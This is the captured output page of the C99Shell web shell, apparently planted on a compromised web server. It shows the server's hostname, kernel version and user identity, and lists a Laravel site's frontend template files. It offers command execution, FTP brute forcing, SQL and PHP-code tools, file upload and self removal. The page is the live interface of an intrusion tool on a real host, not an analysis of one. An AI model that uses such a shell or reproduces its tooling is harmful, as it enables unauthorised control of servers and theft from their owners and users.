!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smab.picotech.app/public_html/resources/views/frontend/partials/   drwxr-xr-x
Free 28.96 GB of 117.98 GB (24.54%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     brands.blade.php (1003 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<section class="top-categories  sm-margin-slider d-none" >
  <div class="flex-wrapper title-row ">
    <div class="cust_left">
      <div class="short-intro">
        <div class="heading-lg">{{ __('homepage')['top_brands'] }}</div>
        <!-- <p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy.</p> -->
      </div>
    </div>
  </div>

  <div class="top-categories">
    <ul class="brand-js slick-arrow">
      @foreach($data['topBrands'] as $key=>$value)
        <li >
          <a href="{{ route('brands.products',['id' => $value->id]) }}" class="brandbox">
              <img src="{{asset('uploads')}}/manufacturer/{{$value->image}}" alt="" title="" style="height:100px;width:100px;" />
          </a>
        </li>
      @endforeach
    </ul>
  </div>

</section>

<style media="screen">
  .slick-slide img {
      display:inline-block;
  }
  .slick-slide {
  margin: 0 5px;
}
</style>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0059 ]--